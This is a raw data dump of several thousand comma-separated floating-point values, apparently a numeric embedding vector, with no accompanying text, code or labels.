0.024743063375353813, -0.006720024161040783, -0.029380571097135544, 0.008388218469917774, -0.0043104104697704315, 0.019553126767277718, -0.0030365497805178165, -0.0425371378660202, -0.01663106121122837, 0.0299766156822443, -0.025818848982453346, 0.007443272043019533, -0.015206372365355492, -0.03980406001210213, 0.0012520542368292809, -0.01844826526939869, -0.023303838446736336, -0.02288224548101425, -0.015831490978598595, 0.005048195831477642, -0.013221983797848225, -0.007148884702473879, 0.005393464583903551, 0.020599836483597755, 0.0018680868670344353, -0.05852854251861572, -0.04285696521401405, -0.05373112112283707, 0.01857910491526127, -0.007886669598519802, -0.008388218469917774, -0.01818658784031868, 0.02075975015759468, 0.018346501514315605, 0.0016136780614033341, -0.011266671121120453, -0.01631123200058937, -0.02004740573465824, 0.061290692538022995, -0.03599519655108452, -0.04945705458521843, -0.01876809448003769, 0.022344352677464485, -0.02528095617890358, 0.028159409761428833, -0.02922065742313862, -0.01106314454227686, 0.005208109505474567, -0.0386991985142231, 0.003572625108063221, -0.03192465752363205, -0.02488844096660614, 0.05596991628408432, -0.004226819146424532, -0.041432276368141174, 0.01270589791238308, 0.022402504459023476, -0.0035162917338311672, -0.007515960372984409, 0.0187099426984787, 0.011332090944051743, -0.004125055391341448, 0.024001644924283028, -0.037623412907123566, 0.022911321371793747, 0.01959673874080181, -0.02734530158340931, -0.023042161017656326, 0.012618672102689743, 0.04314771667122841, -0.022620568051934242, -0.022475192323327065, 0.03663485497236252, -0.0022496997844427824, 0.04660767689347267, 0.02424878440797329, 0.0020697966683655977, 0.05928449705243111, 0.0007963901152834296, 0.03262246400117874, -0.005360755138099194, -0.006018583197146654, 0.018550029024481773, -0.007515960372984409, -0.005106346216052771, -0.05649327114224434, 0.019713040441274643, 0.004692023620009422, 0.004866475239396095, -0.04343847185373306, -0.009122369810938835, 0.053614817559719086, 0.0035181089770048857, 0.023245686665177345, 0.02081790193915367, -0.014421339146792889, 0.004768345970660448, -0.009740219451487064, -0.017576007172465324, 0.014232350513339043, 0.020730676129460335, -0.02657480724155903, -0.04346754401922226, -0.01053978968411684, -0.02449592389166355, 0.006778175011277199, -0.009049681015312672, 0.02122495509684086, -0.012451489455997944, -0.008075659163296223, 0.019829342141747475, -0.02528095617890358, 0.04050186648964882, 0.03529739007353783, 0.004590259864926338, 0.004008754156529903, 0.0008413659525103867, -0.008039315231144428, -0.02629859186708927, -0.0008004788542166352, 0.023507364094257355, -0.03364010155200958, -0.01121578924357891, 0.020091019570827484, -0.012342456728219986, -0.0032273561228066683, 0.03616964817047119, -0.005702389404177666, -0.0007605003193020821, -0.015744265168905258, 0.00444851815700531, -0.023260224610567093, 0.0030365497805178165, 0.001917151384986937, -0.03695468232035637, -0.031052399426698685, 0.019785728305578232, 0.018331965431571007, -0.02862461470067501, -0.0014001565286889672, -0.024292398244142532, 0.018419191241264343, 0.029438722878694534, 0.017590545117855072, -0.0503002367913723, 0.026545731350779533, -0.04631692171096802, 0.02134125679731369, 0.01631123200058937, -0.007119809277355671, -0.020788826048374176, 0.01825927570462227, -0.018942546099424362, 0.006014948710799217, -0.02391441911458969, -0.01006004773080349, 0.03297136723995209, -0.008126541040837765, -0.007959358394145966, 0.024975666776299477, -0.01437772624194622, 0.045677267014980316, 0.0038633779622614384, -0.016194932162761688, -0.0003981950576417148, -0.026095064356923103, -0.0001838784373831004, 0.0267492588609457, -0.00019466810044832528, 0.0348031111061573, 0.012727703899145126, -0.023216612637043, 0.040269263088703156, 0.027069086208939552, -0.04681120440363884, -0.009035144001245499, 0.021908223628997803, -0.023129386827349663, -0.024466849863529205, -0.022009987384080887, 0.011404778808355331, -0.010488907806575298, -0.020599836483597755, -0.025324570015072823, -0.01844826526939869, -0.004172302782535553, 0.0044594211503863335, 0.002776689361780882, -0.017183491960167885, 0.006690949201583862, 0.014973769895732403, -0.012008091434836388, 0.035617221146821976, 0.03837937116622925, 0.01263321004807949, -0.010161810554564, 0.004277700558304787, 0.02831932343542576, 0.00944946613162756, -0.009493079036474228, 0.04806143790483475, -0.0022424310445785522, -0.028450163081288338, 0.029496872797608376, -0.03183743357658386, -0.004517572000622749, -0.020992353558540344, -0.04250806197524071, 0.015119146555662155, -0.02946779690682888, -0.056202519685029984, -0.007690411992371082, -0.02663295716047287, -0.024801215156912804, -0.0028620979283005, -0.01908792182803154, -0.035500917583703995, 0.017488781362771988, 0.01772138476371765, 0.04151950031518936, -0.015598888508975506, -0.0380304679274559, -0.010416219010949135, 0.020091019570827484, 0.010496176779270172, 0.016151318326592445, 0.027970420196652412, -0.0015627964166924357, 0.00046406875480897725, 0.011034069582819939, -0.0045357439666986465, 0.025440871715545654, 0.02991846390068531, 0.03715820983052254, -0.02650211937725544, 0.01273497287184, -0.014305038377642632, -0.027228999882936478, 0.03817584365606308, -0.02483028918504715, 0.026400355622172356, -0.008838885463774204, -0.011935402639210224, -0.00635294895619154, 0.004350388888269663, 0.02766513079404831, 0.03564629331231117, -0.007152519188821316, -0.03712913393974304, -0.015148221515119076, -0.002195183653384447, 0.010408950969576836, 0.035617221146821976, 0.04692750424146652, -0.017517857253551483, 0.0022642374970018864, -0.016994502395391464, 0.019044309854507446, 0.0071089062839746475, -0.019247835502028465, 0.017183491960167885, 0.019102459773421288, -0.0034490551333874464, -0.007163422182202339, -0.017314329743385315, 0.020149169489741325, 0.016282157972455025, -0.005651507992297411, -0.028784528374671936, 0.028653688728809357, -0.021806461736559868, 0.0006246642442420125, -0.016238544136285782, -0.012037166394293308, -0.004612066317349672, 0.03018014132976532, -0.010358069092035294, -0.006465615704655647, -0.016078630462288857, -0.010038240812718868, -0.018622716888785362, 0.0005465244175866246, -0.0028620979283005, 0.007690411992371082, 0.007944820448756218, -0.024990204721689224, 0.009565767832100391, -0.003801593091338873, 0.03631502762436867, 0.012029897421598434, 0.013309209607541561, 0.007843056693673134, -0.008889767341315746, 0.013171101920306683, -0.010605208575725555, 0.04396182671189308, -0.005836862605065107, -0.042071931064128876, 0.015395360998809338, 0.013120220974087715, 0.002934786258265376, 0.036140576004981995, 0.01053978968411684, -0.00899879913777113, 0.014101511798799038, 0.011295747011899948, 0.009464004077017307, -0.01298938225954771, 0.0016909092664718628, -0.0238562673330307, -0.007127078250050545, 0.007646799087524414, 0.0025531731080263853, 0.013389167375862598, -0.013934328220784664, -0.03715820983052254, 0.013338285498321056, -0.03256431594491005, -0.0005542475264519453, 0.018869858235120773, 0.006919916719198227, 0.020105557516217232, 0.02173377200961113, -0.004372195340692997, 0.008206497877836227, 0.01785222254693508, 0.012909424491226673, -0.042973265051841736, -0.003739807987585664, 0.03835029527544975, 0.03177928179502487, -0.010757854208350182, -0.05076543986797333, -0.03893180191516876, 0.01315656490623951, 0.0011857262579724193, -0.008962455205619335, -0.0022715062368661165, -0.027577904984354973, 0.029555022716522217, 0.02907528169453144, -0.010147273540496826, 0.023391064256429672, -0.01002370286732912, -0.010030971840023994, 0.01586056500673294, 0.004822862334549427, -0.025629859417676926, -0.010438025929033756, 0.007018045987933874, 0.007250648457556963, -0.031575754284858704, 0.032913219183683395, 0.012662285007536411, -0.007406927645206451, -0.0128948874771595, -0.013810758478939533, 0.016543835401535034, 0.0029856679029762745, -0.023507364094257355, -0.010234499350190163, -0.003301861695945263, -0.003550818655639887, 0.04521206393837929, -0.0014710274990648031, -0.01876809448003769, -0.004237722139805555, 0.026196828112006187, -0.03012199141085148, 0.03521016612648964, -0.026269515976309776, 0.037041909992694855, 0.001149382209405303, 0.016790974885225296, 0.034599583595991135, 0.004244991112500429, 0.00553157227113843, 0.004346754401922226, -0.040589094161987305, -0.018201125785708427, -0.0026585711166262627, -0.0016236727824434638, 0.02017824538052082, 0.022780483588576317, 0.011913596652448177, 0.02365274168550968, -0.004466690123081207, -0.015773339197039604, 0.006836325395852327, -0.016805512830615044, -0.007515960372984409, -0.01831742748618126, 0.006411099340766668, -0.02057076059281826, 0.0011084950529038906, 0.0020752481650561094, -0.02533910796046257, 0.0167618989944458, -0.007123443763703108, -0.008242841809988022, 0.01170280110090971, -0.01599140465259552, -0.015816953033208847, 0.002620409708470106, -0.04070539399981499, -0.014101511798799038, -0.029438722878694534, -0.008504520170390606, 0.01882624439895153, -0.02528095617890358, 0.021501170471310616, -0.01857910491526127, -0.022678719833493233, 0.010837811045348644, -0.02805764600634575, -0.02701093629002571, 0.007443272043019533, -0.03919347748160362, 0.008460907265543938, 0.03753618896007538, 0.005346217192709446, 0.003808861831203103, -0.01565703935921192, -0.02967132441699505, 0.021762847900390625, -0.015162759460508823, 0.0002948415349237621, 0.00033663722570054233, -0.026851022616028786, 0.0267492588609457, 0.025906074792146683, -0.004274066537618637, 0.015831490978598595, 0.024481385946273804, 0.014392264187335968, 0.0014019736554473639, -0.0058550345711410046, -0.005389830097556114, -0.015613425523042679, -0.02004740573465824, -0.04849756881594658, 0.018041212111711502, -0.02365274168550968, -0.011419316753745079, 0.008577208034694195, 0.013977941125631332, -0.023696353659033775, -0.002191549399867654, -0.03300044313073158, 0.013767145574092865, 0.02456861175596714, -0.052655335515737534, -0.004364926367998123, -0.0043394858948886395, 0.014944694936275482, -0.024990204721689224, 0.007566841784864664, 0.019582202658057213, 0.011223058216273785, -0.0016863662749528885, 0.020687062293291092, 0.010597939603030682, 0.001788129797205329, -0.019771190360188484, 0.027330763638019562, 0.01070697233080864, 0.00501185143366456, -0.0024550440721213818, -0.00039410634781233966, -0.0028675496578216553, 0.021573858335614204, -0.01121578924357891, 0.0019825706258416176, -0.022387966513633728, -0.019683964550495148, 0.019175147637724876, -0.050125785171985626, -0.015133683569729328, 0.03791416808962822, 0.004924625623971224, 0.02991846390068531, -0.024902978911995888, 0.009384047240018845, 0.018346501514315605, 0.030005689710378647, -0.004423077218234539, 0.005666045472025871, 0.019436825066804886, -0.004877378232777119, 0.04306049272418022, -0.03305859491229057, 0.027825044468045235, 0.03643132746219635, -0.012560521252453327, 0.014341382309794426, -0.014697554521262646, 0.020905127748847008, -0.004321313463151455, -0.004364926367998123, 0.047160107642412186, 0.02586246281862259, -0.017561469227075577, 0.01556981261819601, -0.0068326909095048904, 0.010714241303503513, -0.05649327114224434, -0.040385566651821136, 0.005193572025746107, -0.015162759460508823, -0.02030908316373825, -0.007479615975171328, -0.001520092017017305, 0.01882624439895153, -0.007821250706911087, -0.006062196101993322, -0.008577208034694195, -0.021835535764694214, -0.0005592448869720101, -0.002324205357581377, -0.022344352677464485, 0.011651919223368168, -0.004212281201034784, 0.04573541879653931, 0.0007786724017933011, -0.0050336578860878944, 0.027301689609885216, -0.015584350563585758, 0.005324410740286112, 0.03771064057946205, -0.00906421896070242, -0.009798369370400906, -0.034657735377550125, 0.02507743053138256, -0.0027694206219166517, -0.0036816573701798916, 0.02631312981247902, -0.05172492563724518, 0.01972757838666439, -0.007559573277831078, 0.011942671611905098, 0.019683964550495148, 0.05344036594033241, 0.007799444254487753, -0.026865560561418533, 0.0010948660783469677, -0.008758928626775742, 0.056260667741298676, 0.041286900639534, -0.01109221950173378, 0.00028779986314475536, 0.006647336296737194, -0.02243157848715782, -0.005513400305062532, -0.029438722878694534, 0.01722710393369198, 0.006687314715236425, 0.0199892558157444, 0.003701646812260151, -0.0016254899092018604, 0.018157513812184334, -0.026851022616028786, 0.0033745497930794954, -0.004252260085195303, 0.031953733414411545, 0.004590259864926338, -0.00996555294841528, -0.020527148619294167, 0.011622843332588673, -0.01154288649559021, -0.028290249407291412, -0.009536691941320896, -0.002891173353418708, -0.011840907856822014, 0.004226819146424532, 0.0016472963616251945, -0.01636938378214836, 0.012291574850678444, 0.019829342141747475, 0.016732824966311455, 0.0007668605539947748, -0.017692308872938156, 0.01199355348944664, -0.006959895603358746, 0.00116028543561697, -0.0016972695011645555, 0.010132735595107079, 0.013207446783781052, -0.046433225274086, 0.04358384758234024, -0.005030023865401745, -0.008860692381858826, -0.007697680499404669, -0.0030892486684024334, -0.03753618896007538, 0.007068927865475416, 0.013047532178461552, 0.04521206393837929, 0.03262246400117874, -0.03951330855488777, 0.02173377200961113, 0.027447065338492393, -0.01901523396372795, -0.013025726191699505, -0.034657735377550125, -0.015962328761816025, 0.011768219992518425, 0.0011575596872717142, 0.031488530337810516, -0.025368181988596916, 0.017139878123998642, -0.009762025438249111, 0.03448328375816345, 0.02475760132074356, -0.04146135225892067, 0.013389167375862598, -0.00793028250336647, -0.0008945192093960941, -0.020483534783124924, 0.012785854749381542, 0.03599519655108452, -0.01916060969233513, -0.04076354578137398, 0.010307187214493752, 0.030965173617005348, -0.010619746521115303, 0.01920422352850437, -0.007959358394145966, 0.022213514894247055, -0.01831742748618126, -0.014930156990885735, 0.02657480724155903, -0.02933695912361145, 0.022780483588576317, -0.023420138284564018, 0.03430883213877678, -0.005716927349567413, 0.019175147637724876, 0.031633906066417694, 0.013440048322081566, 0.00013776685227639973, -0.0216029342263937, -0.006229379214346409, -0.002256968757137656, 0.0051099807024002075, -0.03207003325223923, -0.007806712761521339, 0.020265471190214157, 0.022678719833493233, -0.020280009135603905, -0.007675874046981335, 0.010074584744870663, 0.0018971620593219995, 0.01889893226325512, -0.027490679174661636, -0.045677267014980316, 0.011884520761668682, -0.008657164871692657, 0.00718886312097311, -0.04745085909962654, -0.00010443250357639045, 0.026909172534942627, -0.017503319308161736, 0.001260231714695692, 0.002680377569049597, -0.00996555294841528, -0.008453638292849064, -0.009740219451487064, -0.007123443763703108, 0.020221857354044914, -0.0025749795604497194, 0.016078630462288857, 0.009674799628555775, -0.002980216406285763, 0.006869035307317972, -0.008955186232924461, -0.0077340248972177505, 0.011760951019823551, -0.04224638268351555, -0.00793028250336647, -0.012960306368768215, -0.054777830839157104, 0.00802477728575468, 0.0056333355605602264, -0.008112003095448017, -0.008206497877836227, 0.0043104104697704315, -0.010096391662955284, 0.012502371333539486, -0.03849567100405693, 0.03241894021630287, -0.02387080527842045, -0.006927185691893101, -0.008359143510460854, 0.014915619045495987, -0.02282409556210041, 0.015075533650815487, -0.010496176779270172, -0.001367446850053966, 0.011295747011899948, -0.01811389997601509, -0.0021424847654998302, 0.016224006190896034, -0.023434676229953766, 0.019582202658057213, 0.0026549366302788258, 0.02043992280960083, -0.00816288497298956, 0.00014548997569363564, -0.022678719833493233, -0.02631312981247902, 0.018390115350484848, 0.005753271281719208, -0.0032328078523278236, -0.03270969167351723, 0.01766323298215866, 0.009289552457630634, -0.011564693413674831, 0.01914607174694538, -0.003605334786698222, 0.012742241844534874, -0.001170280040241778, -0.03919347748160362, 0.015031920745968819, 0.00793028250336647, 0.02856646291911602, -0.000286436959868297, -0.029714936390519142, -0.018070288002490997, -0.004543012473732233, 0.003376367036253214, 0.01901523396372795, 0.0069380891509354115, -0.014290500432252884, 0.012298843823373318, 0.006131249945610762, 0.0004579356755129993, -0.03489033877849579, -0.008373680524528027, -0.029438722878694534, -0.025906074792146683, 0.0038597434759140015, -0.03622779995203018, -0.016107706353068352, -0.02077428810298443, -0.013403704389929771, 0.001545532955788076, 0.04050186648964882, 0.013032995164394379, -0.014661210589110851, 0.0018571835244074464, 0.018680868670344353, 0.001984387869015336, -0.00935497134923935, 0.006302067078649998, -0.006044024135917425, 0.0035417326726019382, 0.015627963468432426, -0.0017181674484163523, 0.025586247444152832, -0.03660577908158302, 0.008431831374764442, 0.001717258826829493, -0.005487959366291761, -0.008300992660224438, -0.0212831050157547, -0.07582833617925644, 0.0071089062839746475, 0.030732572078704834, 0.05428354814648628, 0.020687062293291092, -0.009485810063779354, -0.0046338727697730064, -0.009725681506097317, 0.008242841809988022, 0.03177928179502487, -0.011026800610125065, -0.031633906066417694, -0.009565767832100391, 0.014021554030478, 0.02475760132074356, 0.06326781213283539, -0.039891283959150314, 0.023332912474870682, -0.0005015485803596675, -0.03890272602438927, -0.022155364975333214, 0.02288224548101425, 0.019553126767277718, -0.011630112305283546, -0.014501296915113926, 0.023827193304896355, -0.03680930659174919, 0.004782883916050196, 0.003783420892432332, 0.020032867789268494, -0.010263574309647083, 0.0027930440846830606, 0.009333165362477303, -0.014014285057783127, 0.03334934636950493, 0.009202326647937298, -0.016979964450001717, 0.03366917371749878, -0.01953858882188797, 0.018535491079092026, -0.0032691520173102617, -0.01663106121122837, -0.008860692381858826, 0.03619872406125069, -0.016471147537231445, 0.004801055882126093, 0.008330067619681358, -0.010358069092035294, 0.03134315460920334, 0.03029644303023815, 0.0005774169112555683, -0.004165033809840679, -0.01664559915661812, -0.031372226774692535, -0.026153216138482094, -0.0024186999071389437, -0.013258327730000019, -0.014646672643721104, -0.019335061311721802, 0.012865811586380005, 0.06454712152481079, 0.0008231938700191677, -0.005004582926630974, 0.01972757838666439, 0.02967132441699505, -0.0004243173752911389, 0.003390904748812318, -0.003612603759393096, -0.01636938378214836, 0.01498830784112215, 0.019422287121415138, 0.01173187606036663, -0.0035853455774486065, -0.016078630462288857, 0.01315656490623951, -0.034076228737831116, 0.008388218469917774, -0.01315656490623951, 0.018230201676487923, -0.018986158072948456, -0.02049807272851467, 0.0380304679274559, 0.01644207164645195, -0.0167618989944458, 0.012269768863916397, 0.011412047781050205, 0.025789774954319, -0.023100310936570168, -0.02907528169453144, 0.025353645905852318, -0.010852348990738392, 0.010808736085891724, 0.009202326647937298, 0.012233424931764603, -0.0007795809651724994, -0.01028538029640913, 0.020338159054517746, -0.018811706453561783, -0.015031920745968819, -0.004742905031889677, -0.003576259594410658, 0.0004247716860845685, -0.008838885463774204, -0.010503445751965046, 0.0032746035140007734, -0.021050503477454185, 0.006127615459263325, 0.011688263155519962, -0.0032855067402124405, -0.030383668839931488, 0.023361988365650177, 0.008657164871692657, 0.012458758428692818, -0.014712092466652393, 0.0015927802305668592, 0.012131661176681519, 0.01753239519894123, -0.0009585756924934685, -0.009260477498173714, -0.01382529642432928, 0.00844636932015419, -0.004473959095776081, -0.0031855604611337185, 0.01006004773080349, 0.020192783325910568, 0.023231148719787598, -0.04881739616394043, 0.011339359916746616, 0.014363189227879047, 0.025760699063539505, -0.017881298437714577, 0.04532836377620697, 0.004346754401922226, -0.007421465590596199, -0.0010185434948652983, 0.005077270790934563, 0.019364137202501297, 0.05550471320748329, -0.021326718851923943, -0.008002971298992634, 0.03928070515394211, 0.0027439796831458807, 0.019233297556638718, 0.022024525329470634, 0.02276594564318657, 0.019785728305578232, -0.01321471482515335, -0.005716927349567413, -0.01722710393369198, -0.021355794742703438, -0.008678971789777279, 0.044775933027267456, 0.01753239519894123, -0.003794324118643999, 0.005778712220489979, -0.03753618896007538, 0.04279881343245506, -0.004150496330112219, 0.00672365864738822, 0.00935497134923935, -0.009951015003025532, -0.006563744507730007, 0.015119146555662155, 0.003056538989767432, 0.031430378556251526, -0.005713292863219976, -0.007196132093667984, 0.019175147637724876, 0.011179445311427116, -0.00417593726888299, -0.01463213562965393, 0.004622969776391983, 0.01857910491526127, -0.03616964817047119, -0.01237880066037178, 0.005742367822676897, 0.001602774835191667, 0.006665508262813091, -0.013163833878934383, -0.017009040340781212, -0.017299791797995567, -0.021035965532064438, 0.028130333870649338, -0.011462929658591747, 0.02714177407324314, 0.0021552052348852158, -0.004786517936736345, -0.0034817648120224476, 0.01357088703662157, 0.0019335062243044376, 0.0393097810447216, 0.004212281201034784, 0.019902030006051064, -0.0041395933367311954, 0.04119967296719551, -0.0034217971842736006, 0.011114026419818401, -0.002898442093282938, -0.019305987283587456, -0.009791101329028606, -0.0019262373680248857, 0.0064292713068425655, -0.014573984779417515, -0.009878327138721943, 0.0037289047613739967, 0.008344605565071106, 0.010154541581869125, 0.004757442977279425, -0.0043358514085412025, 0.038466595113277435, -0.0038706467021256685, 0.03320397064089775, 0.02669110894203186, 0.0016055006999522448, -0.009689337573945522, 0.01137570384889841, 0.0199892558157444, 0.018550029024481773, -0.004561184905469418, -0.02881360426545143, 0.009500348009169102, 0.004488496575504541, 0.017561469227075577, 0.013818027451634407, -0.013163833878934383, 0.0158024150878191, -0.0036071520298719406, -0.008809810504317284, -0.04843941703438759, -0.02211175113916397, 0.015075533650815487, 0.008693508803844452, 0.0042849695309996605, 0.001381075824610889, 0.021137729287147522, -0.032855067402124405, 0.009129637852311134, 0.005022754892706871, 0.010241767391562462, -0.010888692922890186, -0.020672524347901344, -0.008555401116609573, 0.00873712170869112, -0.013723532669246197, 0.025833386927843094, -0.012684090994298458, 0.002162473974749446, -0.0023823557421565056, -0.026167752221226692, 0.012589597143232822, 0.016296695917844772, 0.019567664712667465, -0.019509512931108475, -0.0393388569355011, 0.011942671611905098, 0.004964604042470455, -0.019582202658057213, 0.030209217220544815, 0.015322673134505749, 0.012625941075384617, 0.00944946613162756, 0.01554073765873909, 0.029177045449614525, 0.002535001141950488, -0.011521080508828163, -0.014174199663102627, 0.002395076211541891, -0.02036723494529724, 0.04151950031518936, 0.0028148507699370384, 0.004593894351273775, 0.00045430127647705376, 0.008410025388002396, 0.03509386256337166, 0.003280055243521929, 0.004408539272844791, -0.036983758211135864, -0.020527148619294167, 0.006472884677350521, 0.009863789193332195, 0.011935402639210224, 0.046200621873140335, -0.01002370286732912, 0.010263574309647083, 0.016194932162761688, 0.012197080068290234, 0.03785601630806923, 0.007156153675168753, -0.0004477138863876462, 0.018491879105567932, -0.0022424310445785522, 0.01830288954079151, 0.0077340248972177505, -0.0025168289430439472, -0.008431831374764442, -0.013599962927401066, 0.005549744237214327, 0.012240692973136902, 0.012233424931764603, -0.010975918732583523, 0.01772138476371765, 0.010917767882347107, -0.005916819907724857, 0.005611529108136892, -0.009754756465554237, -0.00024895710521377623, 0.005473421886563301, 0.0064837876707315445, -0.013476393185555935, -0.01025630533695221, 0.001891710446216166, 0.019451363012194633, 0.004968238528817892, -0.013331016525626183, -0.030616270378232002, 0.025629859417676926, 0.02327476255595684, -0.006607357412576675, 0.024670375511050224, -0.03750711306929588, 0.01753239519894123, -0.014930156990885735, 0.017590545117855072, -0.023187536746263504, -0.0009476724662818015, -0.013469124212861061, 0.002934786258265376, 0.017881298437714577, -0.006127615459263325, 0.0006223927484825253, -0.009616648778319359, 0.026065990328788757, -0.014821124263107777, -0.00691264821216464, -0.02049807272851467, 0.008468175306916237, 0.0030601732432842255, -0.01008912269026041, 0.008671702817082405, 0.021457556635141373, 0.005887744482606649, 0.010488907806575298, -0.0143486512824893, -0.010975918732583523, 0.01850641705095768, -0.02366727963089943, -0.003750711213797331, 0.00017536028462927788, 0.010503445751965046, -0.019436825066804886, 0.01728525385260582, 0.019305987283587456, -0.006774540524929762, -0.0015037371776998043, -0.01754693128168583, 0.011390241794288158, -0.0038670124486088753, 0.0006292072357609868, 0.012567790225148201, -0.007748562376946211, -0.008141078986227512, 0.01953858882188797, 0.017764996737241745, 0.012545984238386154, -0.01263321004807949, 0.009943746030330658, -0.011768219992518425, -0.0098274452611804, 0.01709626615047455, -0.003383635776117444, -0.01830288954079151, 0.002046172972768545, -0.028014034032821655, -0.004990044981241226, -0.009434929117560387, -0.022329816594719887, -0.01447222102433443, 0.012916693463921547, 0.006967164110392332, -0.010627015493810177, -0.01709626615047455, 0.0060840025544166565, -0.001817205105908215, 0.019582202658057213, 0.027679666876792908, -0.01083054207265377, -0.02230074070394039, 0.0014628501376137137, 0.00035912514431402087, 0.01389798428863287, -0.006869035307317972, 0.014864737167954445, 0.04419442638754845, 0.03422160446643829, 0.010234499350190163, 0.015438973903656006, 0.026414893567562103, 0.005607894621789455, -0.028551926836371422, -0.006618260871618986, 0.002302398905158043, 0.02876999042928219, -0.004426711704581976, 0.030470894649624825, -0.010648821480572224, -0.01080146711319685, 0.023565515875816345, -0.0021170438267290592, -0.014857468195259571, 0.00472473306581378, -0.0038670124486088753, 0.014406802132725716, 0.012553252279758453, 0.007486884947866201, -0.013832565397024155, 0.0022115386091172695, 0.028915366157889366, 0.05253903195261955, 0.015642501413822174, -0.005157228093594313, -0.001199355348944664, 0.013650844804942608, -0.00024282402591779828, -0.00481922784820199, -0.0070289489813148975, 0.007145250216126442, 0.031953733414411545, 0.013178370893001556, -0.012466026470065117, -0.0025749795604497194, 0.009427660144865513, -0.01125213410705328, 0.014392264187335968, 0.028392011299729347, 0.03776878863573074, 0.006836325395852327, 0.024801215156912804, 0.014028823003172874, 0.008606282994151115, 0.028072183951735497, 0.0052335504442453384, -0.03765248879790306, -0.006345679983496666, -0.009762025438249111, -0.01985841616988182, 0.00217701168730855, -0.012902156449854374, -0.006592819932848215, -0.000753231521230191, 0.009689337573945522, 0.012204349040985107, -0.03018014132976532, 0.014043360948562622, 0.004506668541580439, -0.005698754917830229, 0.022286202758550644, -0.00037956872256472707, 0.0010721510043367743, -0.0013056618627160788, -0.0016763716703280807, -0.022460654377937317, -0.0023587322793900967, 0.0015182748902589083, -0.002091603120788932, 0.0212685689330101, 0.026720182970166206, 0.01702357642352581, -0.018855320289731026, 0.005760540254414082, 0.010714241303503513, 0.0270836241543293, 0.011746414005756378, 0.00970387551933527, -0.032535240054130554, -0.008671702817082405, 0.00010477322939550504, 0.0141814686357975, -0.006956261117011309, -0.022024525329470634, -0.020483534783124924, -0.008388218469917774, -0.002731259213760495, -0.025106504559516907, -0.018201125785708427, 0.01972757838666439, -0.01972757838666439, 0.012575059197843075, -0.0011666456703096628, 0.017706846818327904, 0.006970798596739769, -0.017590545117855072, -0.02927880734205246, 0.0008972450159490108, 0.0036634854041039944, 0.013316478580236435, 0.008911573328077793, -0.01173187606036663, -0.008955186232924461, -0.005382561590522528, 0.004223184660077095, -0.012197080068290234, -0.011223058216273785, -0.01682005077600479, -0.013367360457777977, -0.023245686665177345, 0.0023005816619843245, 0.006018583197146654, 0.0014355919556692243, -0.0024005279410630465, -0.005844131577759981, 0.019305987283587456, 0.02552809752523899, -0.005978604778647423, 0.02057076059281826, 0.011710069142282009, -0.0003548092790879309, 0.006581916939467192, -0.022547880187630653, -0.0025931515265256166, 0.022998547181487083, 0.02939510904252529, -0.004052367527037859, -0.005549744237214327, 0.007981164380908012, -0.004924625623971224, 0.003925162833184004, -0.011550155468285084, 0.008359143510460854, -0.017459705471992493, 0.002987485146149993, -0.0006787261227145791, 0.02308577299118042, -0.019262373447418213, -0.01644207164645195, 0.012662285007536411, -0.027185387909412384, 0.002291495678946376, -0.006745465099811554, 0.006865400820970535, 0.00535348616540432, 0.02599330060184002, -0.009616648778319359, -0.010946843773126602, 0.0067345621064305305, -0.009907402098178864, -0.004324947949498892, -0.020876051858067513, -0.007116175256669521, -0.018230201676487923, 0.024902978911995888, -0.015293598175048828, 0.006120346486568451, -0.008911573328077793, 0.004702926613390446, 0.014050629921257496, 0.018739018589258194, 0.005237184930592775, 0.017576007172465324, 0.00018819430260919034, -0.008788003586232662, -0.025106504559516907, 0.02006194368004799, 0.022329816594719887, 0.0004236359382048249, -0.007225207518786192, -0.0026185924652963877, 0.005404368042945862, -0.002087968634441495, -0.013418242335319519, -0.0003098334709648043, 0.0047101955860853195, -0.001902613672427833, 0.0001931916194735095, -0.006770906038582325, 0.015686113387346268, -0.020003793761134148, -0.0066546048037707806, -0.0048592062667012215, -0.022068139165639877, -0.000031034454877953976, 0.012982113286852837, 0.023260224610567093, 0.00001227323264174629, -0.020919665694236755, -0.0031928292009979486, -0.0012375166406854987, -0.028929904103279114, 0.0007695863605476916, -0.005778712220489979, -0.011448391713202, -0.0002082971332129091, 0.011790026910603046, -0.008562670089304447, 0.004426711704581976, -0.008032046258449554, 0.021777385845780373, -0.01292396243661642, 0.016427533701062202, 0.027999496087431908, -0.017198028042912483, 0.0002500928530935198, -0.026603883132338524, 0.011397509835660458, -0.020483534783124924, 0.017256179824471474, 0.016427533701062202, -0.020425384864211082, -0.0009004251332953572, -0.0046593137085437775, 0.006698217708617449, -0.00581869063898921, -0.019247835502028465, -0.006294798571616411, -0.0046556792221963406, 0.0050336578860878944, 0.019102459773421288, 0.012647747062146664, -0.003772517666220665, 0.00825737975537777, 0.009958283975720406, 0.0018335599452257156, 0.00935497134923935, 0.02295493520796299, 0.0032164528965950012, 0.014784780330955982, 0.009049681015312672, 0.004637507256120443, -0.0007577745127491653, -0.0026858290657401085, 0.001195720979012549, 0.015308135189116001, -0.0040341950953006744, -0.0012702263193205, -0.014246887527406216, 0.005687851924449205, -0.01527906022965908, 0.00453210948035121, -0.010561595670878887, -0.00864262692630291, 0.02243157848715782, -0.004622969776391983, 0.0002598603314254433, -0.028537388890981674, -0.0021352160256356, -0.01985841616988182, -0.01593325473368168, -0.007356046233326197, -0.00195712991990149, -0.011164908297359943, 0.019189685583114624, 0.036838382482528687, -0.002131581539288163, -0.0014819307252764702, 0.019116997718811035, -0.024728527292609215, -0.010554326698184013, 0.004553915932774544, 0.0018217480974271894, -0.004281335044652224, 0.02496112883090973, -0.022533342242240906, 0.014675748534500599, -0.017503319308161736, -0.011535617522895336, -0.02295493520796299, 0.01189905870705843, 0.0065383040346205235, -0.006999874021857977, -0.02567347325384617, 0.01199355348944664, 0.00010085487883770838, -0.00267674308270216, 0.0036362274549901485, 0.017387017607688904, 0.024336010217666626, -0.0029275172855705023, 0.011390241794288158, -0.015206372365355492, -0.019305987283587456, -0.02849377505481243, -0.011913596652448177, 0.026211366057395935, 0.011288478039205074, -0.008460907265543938, 0.004957335535436869, -0.005408002063632011, 0.0167618989944458, -0.027243537828326225, 0.015424436889588833, -0.007421465590596199, 0.009871058166027069, -0.00717432564124465, 0.012567790225148201, 0.015322673134505749, -0.013163833878934383, 0.03215726092457771, 0.004441249184310436, 0.01070697233080864, -0.0032673347741365433, -0.012138930149376392, -0.0348031111061573, -0.006650970783084631, -0.013309209607541561, -0.01025630533695221, 0.0008372772135771811, 0.00019716675160452724, 0.007893938571214676, 0.033233046531677246, -0.0087080467492342, 0.0174160934984684, -0.0031165066175162792, 0.0029002593364566565, -0.013912522234022617, 0.008911573328077793, 0.015046457760035992, 0.007944820448756218, 